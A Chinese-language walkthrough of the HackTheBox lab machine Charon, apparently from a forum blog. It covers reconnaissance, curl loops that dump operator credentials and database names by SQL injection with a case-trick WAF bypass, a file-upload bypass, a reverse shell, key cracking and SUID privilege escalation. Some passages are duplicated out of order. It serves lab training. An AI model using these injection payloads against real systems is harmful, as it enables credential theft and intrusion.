HackTheBox-Linux-Charon-Walkthrough
- 靶机地址: https://www.hackthebox.eu/home/machines/profile/42
- 难度: 中级(3.5/10)
- 发布日期: 2017年10月7日
Charon是HackTheBox上更具挑战性的机器之一。虽然不需要高级技术,但在渗透的每一步都需要许多微妙的技巧。
注意: 我遵循了平台授权,使用Kali Linux作为攻击机。文章中的技术仅供学习目的使用,任何其他目的的使用与本人无关。
一、信息收集:
- 端口扫描: 使用nmap发现开放了OpenSSH和Apache服务。
访问80端口,发现是一个cms界面。对其进行了翻查,未发现可利用之处。 - 目录扫描: 使用gobuster进行目录扫描,发现存在cmsdata目录。访问后发现登录框,尝试弱口令未成功。
对其进行了翻查,未发现可利用之处。
访问后发现登录框,尝试弱口令未成功。
二、漏洞利用:
- SQL注入: 输入’报错,进而确认存在SQL注入。使用脚本枚举出可用的用户名。for i in $(seq 0 300); do
payload=”email=a@b.com’ UNIoN SELECT 1,2,3,CONCAT(__username_, ‘:’, __password_, ‘@b.com’) FROM supercms.operators LIMIT 1 OFFSET $i– -“
curl -s -d “$payload” http://10.10.10.31/cmsdata/forgot.php | grep -o ‘[^ ]*@b.com’
done - 手工Union查询Bypass WAF: 经过测试,发现需要使用大写的UNION SELECT才能成功进行注入。使用脚本探测出电子邮箱地址列。for i in {0..100}; do curl -s http://10.10.10.31/cmsdata/forgot.php –data-urlencode “email=a@b.c’ UNiON SELECT 1,schema_name,3,’a@b.c’ from information_schema.schemata limit ${i},1;– -” | grep ‘<h2>’ | awk ‘{print $5}’ | grep -v “^with$” || break; done | cut -d’>’ -f2
- 文件上传Bypass: 通过修改前端代码以绕过文件上传限制,成功上传了可执行文件。
使用脚本枚举出可用的用户名。
for i in $(seq 0 300); do
使用脚本探测出电子邮箱地址列。
for i in {0..100}; do curl -s http://10.10.10.31/cmsdata/forgot.php –data-urlencode “email=a@b.c’ UNiON SELECT 1,schema_name,3,’a@b.c’ from information_schema.schemata limit ${i},1;– -” | grep ‘<h2>’ | awk ‘{print $5}’ | grep -v “^with$” || break; done | cut -d’>’ -f2
三、权限提升:
- 使用bash反弹Shell: 成功反弹Shell,发现在/home/decoder目录下存在2个密钥。
- 密钥解密: 使用RsaCtfTool进行暴力破解,成功解密密钥。
- SSH远程登录: 获取第一个flag(user.txt)。
- 利用find命令查找可利用的SUID文件: 发现supershell可以利用,成功读取了root.txt。
发现在/home/decoder目录下存在2个密钥。
成功解密密钥。
成功读取了root.txt。
总结: Charon的难度适中,但带来了许多知识点。操作流程包括信息收集、漏洞利用(如SQL注入和文件上传)、反弹Shell、密钥解密以及权限提升。建议有兴趣的小伙伴尝试挑战。
© 版权声明
THE END
![表情[qiudale]-山海云端论坛](https://www.shserve.cn/wp-content/themes/Shanhai/img/smilies/qiudale.gif)
我也是买了领不了、
暂无评论内容